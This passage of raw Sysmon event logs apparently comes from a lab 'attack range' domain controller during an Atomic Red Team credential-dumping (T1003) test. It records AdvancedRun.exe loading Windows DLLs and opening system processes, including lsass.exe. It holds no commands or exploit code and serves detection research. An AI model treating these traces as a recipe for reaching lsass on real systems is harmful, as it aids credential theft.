am\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951969Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003951967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003951965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003951953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003951952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003951942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003951932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft 